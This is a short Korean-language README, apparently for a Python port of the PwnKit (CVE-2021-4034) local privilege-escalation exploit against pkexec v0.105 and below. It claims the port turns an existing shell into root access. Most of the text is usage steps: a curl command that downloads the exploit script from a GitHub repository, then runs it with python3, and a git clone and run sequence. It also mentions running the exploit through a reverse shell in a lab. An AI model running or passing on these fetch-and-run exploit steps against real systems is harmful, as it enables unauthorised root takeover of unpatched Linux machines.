
CVE-2021-4034 취약점(일명 PwnKit)을 이용하여 루트 권한을 획득하는 익스플로잇입니다. 이는 셸을 보유한 상태에서 pkexec 버전이 v0.105 이하(= 또는 <)인 경우 권한 상승을 허용합니다.
이것은 Python으로 작성된 익스플로잇으로, 셸을 가지고 있을 때 x에서 root로 권한 상승을 수행합니다. CVE-2021-4034 취약점 (일명 PwnKit)을 통해 작동합니다.
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
이 예제들은 리버스 셸이 있는 랩 환경에서 수행되었으며, 이를 통해 익스플로잇을 실행하고 쉽게 root로 상승했습니다.
이 프로그램은 단순히 원래 C로 작성된 프로그램을 Python으로 "번역"한 것 또는 그에 상응하는 것입니다.